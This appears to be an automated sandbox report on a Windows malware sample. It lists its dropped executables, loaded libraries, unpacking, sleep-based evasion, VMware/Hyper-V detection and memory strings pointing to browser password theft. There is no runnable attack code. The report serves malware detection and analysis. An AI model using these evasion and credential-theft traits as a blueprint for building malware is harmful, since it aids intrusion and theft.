Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2889.tmp.exe, 00000003.00000003.1445794899.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1404980775.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1445466477.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1405732837.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: b0cQukXPAl.exe	Virustotal: Detection: 40%
Source: b0cQukXPAl.exe	ReversingLabs: Detection: 83%

Source: unknown	Process created: C:\Users\user\Desktop\b0cQukXPAl.exe "C:\Users\user\Desktop\b0cQukXPAl.exe"
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Process created: C:\Users\user\AppData\Local\Temp\2889.tmp.exe "C:\Users\user\AppData\Local\Temp\2889.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1852
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Process created: C:\Users\user\AppData\Local\Temp\2889.tmp.exe "C:\Users\user\AppData\Local\Temp\2889.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Unpacked PE file: 0.2.b0cQukXPAl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Unpacked PE file: 3.2.2889.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Unpacked PE file: 0.2.b0cQukXPAl.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Unpacked PE file: 3.2.2889.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC4E

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00410756 push ecx; ret	0_2_00410769
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0040FD82 push ecx; ret	0_2_0040FD95
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_005633B1 push 00000003h; ret	0_2_005633B5
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_005615F4 push es; iretd	0_2_00561605
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_005626C4 push ds; ret	0_2_005626CD
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_005659C0 pushad ; ret	0_2_005659DC
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00565B3D push ecx; ret	0_2_00565B5A
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0212798F push esp; retf	0_2_02127997
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_021009BD push ecx; ret	0_2_021009D0
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0210CE08 push es; retf	0_2_0210CE0D
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02127F8D push esp; retf	0_2_02127F8E
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020FFFE9 push ecx; ret	0_2_020FFFFC
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02129DD8 pushad ; retf	0_2_02129DDF
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083E79C push ds; iretd	3_3_0083E7A2
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083E79C push ds; iretd	3_3_0083E7A2
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083E79C push ds; iretd	3_3_0083E7A2
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083E79C push ds; iretd	3_3_0083E7A2
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083E79C push ds; iretd	3_3_0083E7A2
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083F11C pushfd ; retn 0080h	3_3_0083F11D
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083F11C pushfd ; retn 0080h	3_3_0083F11D
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083F11C pushfd ; retn 0080h	3_3_0083F11D
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083F11C pushfd ; retn 0080h	3_3_0083F11D
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083F11C pushfd ; retn 0080h	3_3_0083F11D
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D694 push esi; retf	3_3_0083D697

Source: b0cQukXPAl.exe	Static PE information: section name: .text entropy: 7.856888213032163
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.809678678911755
Source: 2889.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.809678678911755

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	File created: C:\Users\user\AppData\Local\Temp\2889.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E96A

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Window / User API: threadDelayed 1593			Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Window / User API: threadDelayed 8396			Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-64836

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\b0cQukXPAl.exe TID: 7920	Thread sleep count: 1593 > 30	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe TID: 7920	Thread sleep time: -1150146s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe TID: 7920	Thread sleep count: 8396 > 30	Jump to behavior
Source: C:\Users\user\Desktop\b0cQukXPAl.exe TID: 7920	Thread sleep time: -6061912s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe TID: 7956	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004389E2 FindFirstFileExW,		0_2_004389E2
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02128C49 FindFirstFileExW,		0_2_02128C49

Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: 2889.tmp.exe, 00000003.00000002.1792386987.0000000000799000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: b0cQukXPAl.exe, 00000000.00000002.3754266526.000000000061C000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000002.3754266526.000000000064B000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.000000000061B000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: b0cQukXPAl.exe, 00000000.00000002.3754266526.000000000064B000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.000000000064B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
